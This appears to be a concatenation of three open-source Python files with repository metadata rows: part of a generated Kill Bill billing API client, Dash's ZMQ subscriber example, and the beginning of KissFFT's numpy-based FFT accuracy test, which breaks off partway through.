'/1.0/kb/accounts/{accountId}/cbaRebalancing', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
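
    # Minimal usage sketch for rebalance_existing_cba_on_account, assuming a
    # configured `account_api` and a valid `account_id`:
    #
    #     account_api.rebalance_existing_cba_on_account(account_id, created_by='demo')
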
def refresh_payment_methods(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Refresh account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.refresh_payment_methods(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.refresh_payment_methods_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.refresh_payment_methods_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def refresh_payment_methods_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Refresh account payment methods # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.refresh_payment_methods_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Str plugin_name:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'created_by', 'plugin_name', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method refresh_payment_methods" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `refresh_payment_methods`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `refresh_payment_methods`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `refresh_payment_methods`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'plugin_name' in params:
query_params.append(('pluginName', params['plugin_name'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods/refresh', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
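
    # Minimal usage sketch for refresh_payment_methods, assuming a configured
    # `account_api` and a valid `account_id`; the plugin name is purely illustrative
    # and depends on which payment plugin is actually installed:
    #
    #     account_api.refresh_payment_methods(account_id, created_by='demo',
    #                                         plugin_name='demo-payment-plugin')
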
def remove_email(self, account_id=None, email=None, created_by=None, **kwargs): # noqa: E501
"""Delete email from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_email(account_id, email, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str email: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.remove_email_with_http_info(account_id, email, created_by, **kwargs) # noqa: E501
else:
(data) = self.remove_email_with_http_info(account_id, email, created_by, **kwargs) # noqa: E501
return data
def remove_email_with_http_info(self, account_id=None, email=None, created_by=None, **kwargs): # noqa: E501
"""Delete email from account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.remove_email_with_http_info(account_id, email, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str email: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'email', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_email" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `remove_email`") # noqa: E501
# verify the required parameter 'email' is set
if ('email' not in params or
params['email'] is None):
raise ValueError("Missing the required parameter `email` when calling `remove_email`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `remove_email`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `remove_email`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
if 'email' in params:
path_params['email'] = params['email'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails/{email}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def search_accounts(self, search_key=None, **kwargs): # noqa: E501
"""Search accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.search_accounts(search_key, async=True)
>>> result = thread.get()
:param async bool
:param Str search_key: (required)
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.search_accounts_with_http_info(search_key, **kwargs) # noqa: E501
else:
(data) = self.search_accounts_with_http_info(search_key, **kwargs) # noqa: E501
return data
def search_accounts_with_http_info(self, search_key=None, **kwargs): # noqa: E501
"""Search accounts # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.search_accounts_with_http_info(search_key, async=True)
>>> result = thread.get()
:param async bool
:param Str search_key: (required)
:param Int offset:
:param Int limit:
:param Bool account_with_balance:
:param Bool account_with_balance_and_cba:
:param Str audit:
:return: List[Account]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['search_key', 'offset', 'limit', 'account_with_balance', 'account_with_balance_and_cba', 'audit'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'search_key' is set
if ('search_key' not in params or
params['search_key'] is None):
raise ValueError("Missing the required parameter `search_key` when calling `search_accounts`") # noqa: E501
if 'search_key' in params and not re.search('.*', params['search_key']): # noqa: E501
raise ValueError("Invalid value for parameter `search_key` when calling `search_accounts`, must conform to the pattern `/.*/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'search_key' in params:
path_params['searchKey'] = params['search_key'] # noqa: E501
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'account_with_balance' in params:
query_params.append(('accountWithBalance', params['account_with_balance'])) # noqa: E501
if 'account_with_balance_and_cba' in params:
query_params.append(('accountWithBalanceAndCBA', params['account_with_balance_and_cba'])) # noqa: E501
if 'audit' in params:
query_params.append(('audit', params['audit'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/search/{searchKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[Account]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_default_payment_method(self, account_id=None, payment_method_id=None, created_by=None, **kwargs): # noqa: E501
"""Set the default payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.set_default_payment_method(account_id, payment_method_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str payment_method_id: (required)
:param Str created_by: (required)
:param Bool pay_all_unpaid_invoices:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.set_default_payment_method_with_http_info(account_id, payment_method_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.set_default_payment_method_with_http_info(account_id, payment_method_id, created_by, **kwargs) # noqa: E501
return data
def set_default_payment_method_with_http_info(self, account_id=None, payment_method_id=None, created_by=None, **kwargs): # noqa: E501
"""Set the default payment method # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.set_default_payment_method_with_http_info(account_id, payment_method_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str payment_method_id: (required)
:param Str created_by: (required)
:param Bool pay_all_unpaid_invoices:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'payment_method_id', 'created_by', 'pay_all_unpaid_invoices', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_default_payment_method" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `set_default_payment_method`") # noqa: E501
# verify the required parameter 'payment_method_id' is set
if ('payment_method_id' not in params or
params['payment_method_id'] is None):
raise ValueError("Missing the required parameter `payment_method_id` when calling `set_default_payment_method`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `set_default_payment_method`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `set_default_payment_method`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
if 'payment_method_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['payment_method_id']): # noqa: E501
raise ValueError("Invalid value for parameter `payment_method_id` when calling `set_default_payment_method`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
if 'payment_method_id' in params:
path_params['paymentMethodId'] = params['payment_method_id'] # noqa: E501
query_params = []
if 'pay_all_unpaid_invoices' in params:
query_params.append(('payAllUnpaidInvoices', params['pay_all_unpaid_invoices'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/paymentMethods/{paymentMethodId}/setDefault', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def transfer_child_credit_to_parent(self, child_account_id=None, created_by=None, **kwargs): # noqa: E501
"""Move a given child credit to the parent level # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.transfer_child_credit_to_parent(child_account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str child_account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.transfer_child_credit_to_parent_with_http_info(child_account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.transfer_child_credit_to_parent_with_http_info(child_account_id, created_by, **kwargs) # noqa: E501
return data
def transfer_child_credit_to_parent_with_http_info(self, child_account_id=None, created_by=None, **kwargs): # noqa: E501
"""Move a given child credit to the parent level # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.transfer_child_credit_to_parent_with_http_info(child_account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str child_account_id: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['child_account_id', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method transfer_child_credit_to_parent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'child_account_id' is set
if ('child_account_id' not in params or
params['child_account_id'] is None):
raise ValueError("Missing the required parameter `child_account_id` when calling `transfer_child_credit_to_parent`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `transfer_child_credit_to_parent`") # noqa: E501
if 'child_account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['child_account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `child_account_id` when calling `transfer_child_credit_to_parent`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'child_account_id' in params:
path_params['childAccountId'] = params['child_account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{childAccountId}/transferCredit', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Update account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_account(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Account body: (required)
:param Str created_by: (required)
:param Bool treat_null_as_reset:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.update_account_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.update_account_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def update_account_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Update account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.update_account_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Account body: (required)
:param Str created_by: (required)
:param Bool treat_null_as_reset:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'treat_null_as_reset', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `update_account`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `update_account`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `update_account`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `update_account`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'treat_null_as_reset' in params:
query_params.append(('treatNullAsReset', params['treat_null_as_reset'])) # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
apache-2.0
| 8,223,314,462,339,926,000
| 42.553597
| 207
| 0.58277
| false
| 4.037577
| false
| false
| false
|
nmarley/dash
|
contrib/zmq/zmq_sub.py
|
1
|
5988
|
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""
ZMQ example using python3's asyncio
Dash should be started with the command line arguments:
dashd -testnet -daemon \
-zmqpubrawtx=tcp://127.0.0.1:28332 \
-zmqpubrawblock=tcp://127.0.0.1:28332 \
-zmqpubhashtx=tcp://127.0.0.1:28332 \
-zmqpubhashblock=tcp://127.0.0.1:28332
We use the asyncio library here. `self.handle()` installs itself as a new
future at the end of each call, so the event loop never runs out of pending
futures and the script keeps receiving messages indefinitely. An
alternative is to wrap the contents of `handle` inside `while True`.
A blocking example using python 2.7 can be obtained from the git history:
https://github.com/bitcoin/bitcoin/blob/37a7fe9e440b83e2364d5498931253937abe9294/contrib/zmq/zmq_sub.py
"""
import binascii
import asyncio
import zmq
import zmq.asyncio
import signal
import struct
import sys
if sys.version_info < (3, 5):
print("This example only works with Python 3.5 and greater")
exit(1)
port = 28332
class ZMQHandler():
def __init__(self):
self.loop = asyncio.get_event_loop()
self.zmqContext = zmq.asyncio.Context()
self.zmqSubSocket = self.zmqContext.socket(zmq.SUB)
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashchainlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashtxlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashgovernancevote")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashgovernanceobject")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "hashinstantsenddoublespend")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawblock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawchainlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawchainlocksig")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtx")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtxlock")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawtxlocksig")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawgovernancevote")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawgovernanceobject")
self.zmqSubSocket.setsockopt_string(zmq.SUBSCRIBE, "rawinstantsenddoublespend")
self.zmqSubSocket.connect("tcp://127.0.0.1:%i" % port)
async def handle(self) :
msg = await self.zmqSubSocket.recv_multipart()
topic = msg[0]
body = msg[1]
sequence = "Unknown"
if len(msg[-1]) == 4:
msgSequence = struct.unpack('<I', msg[-1])[-1]
sequence = str(msgSequence)
if topic == b"hashblock":
print('- HASH BLOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashchainlock":
print('- HASH CHAINLOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashtx":
print ('- HASH TX ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashtxlock":
print('- HASH TX LOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashgovernancevote":
print('- HASH GOVERNANCE VOTE ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashgovernanceobject":
print('- HASH GOVERNANCE OBJECT ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"hashinstantsenddoublespend":
print('- HASH IS DOUBLE SPEND ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawblock":
print('- RAW BLOCK HEADER ('+sequence+') -')
print(binascii.hexlify(body[:80]).decode("utf-8"))
elif topic == b"rawchainlock":
print('- RAW CHAINLOCK ('+sequence+') -')
print(binascii.hexlify(body[:80]).decode("utf-8"))
elif topic == b"rawchainlocksig":
print('- RAW CHAINLOCK SIG ('+sequence+') -')
print(binascii.hexlify(body[:80]).decode("utf-8"))
elif topic == b"rawtx":
print('- RAW TX ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawtxlock":
print('- RAW TX LOCK ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawtxlocksig":
print('- RAW TX LOCK SIG ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawgovernancevote":
print('- RAW GOVERNANCE VOTE ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawgovernanceobject":
print('- RAW GOVERNANCE OBJECT ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
elif topic == b"rawinstantsenddoublespend":
print('- RAW IS DOUBLE SPEND ('+sequence+') -')
print(binascii.hexlify(body).decode("utf-8"))
# schedule ourselves to receive the next message
asyncio.ensure_future(self.handle())
def start(self):
self.loop.add_signal_handler(signal.SIGINT, self.stop)
self.loop.create_task(self.handle())
self.loop.run_forever()
def stop(self):
self.loop.stop()
self.zmqContext.destroy()
daemon = ZMQHandler()
daemon.start()
|
mit
| 356,747,117,795,739,300
| 43.686567
| 107
| 0.629092
| false
| 3.532743
| false
| false
| false
|
mpoullet/audio-tools
|
KissFFT/kiss_fft130/test/testkiss.py
|
1
|
3565
|
#!/usr/bin/env python
import math
import sys
import os
import random
import struct
import popen2
import getopt
import numpy
pi=math.pi
e=math.e
j=complex(0,1)
doreal=0
datatype = os.environ.get('DATATYPE','float')
util = '../tools/fft_' + datatype
minsnr=90
if datatype == 'double':
fmt='d'
elif datatype=='int16_t':
fmt='h'
minsnr=10
elif datatype=='int32_t':
fmt='i'
elif datatype=='simd':
fmt='4f'
sys.stderr.write('testkiss.py does not yet test simd')
sys.exit(0)
elif datatype=='float':
fmt='f'
else:
sys.stderr.write('unrecognized datatype %s\n' % datatype)
sys.exit(1)
def dopack(x,cpx=1):
x = numpy.reshape( x, ( numpy.size(x),) )
if cpx:
s = ''.join( [ struct.pack(fmt*2,c.real,c.imag) for c in x ] )
else:
s = ''.join( [ struct.pack(fmt,c.real) for c in x ] )
return s
def dounpack(x,cpx):
uf = fmt * ( len(x) / struct.calcsize(fmt) )
s = struct.unpack(uf,x)
if cpx:
return numpy.array(s[::2]) + numpy.array( s[1::2] )*j
else:
return numpy.array(s )
def make_random(dims=[1]):
res = []
for i in range(dims[0]):
if len(dims)==1:
r=random.uniform(-1,1)
if doreal:
res.append( r )
else:
i=random.uniform(-1,1)
res.append( complex(r,i) )
else:
res.append( make_random( dims[1:] ) )
return numpy.array(res)
def flatten(x):
ntotal = numpy.size(x)
return numpy.reshape(x,(ntotal,))
def randmat( ndims ):
dims=[]
for i in range( ndims ):
curdim = int( random.uniform(2,5) )
if doreal and i==(ndims-1):
curdim = int(curdim/2)*2 # force even last dimension if real
dims.append( curdim )
return make_random(dims )
def test_fft(ndims):
x=randmat( ndims )
if doreal:
xver = numpy.fft.rfftn(x)
else:
xver = numpy.fft.fftn(x)
open('/tmp/fftexp.dat','w').write(dopack( flatten(xver) , True ) )
x2=dofft(x,doreal)
err = xver - x2
errf = flatten(err)
xverf = flatten(xver)
errpow = numpy.vdot(errf,errf)+1e-10
sigpow = numpy.vdot(xverf,xverf)+1e-10
snr = 10*math.log10(abs(sigpow/errpow) )
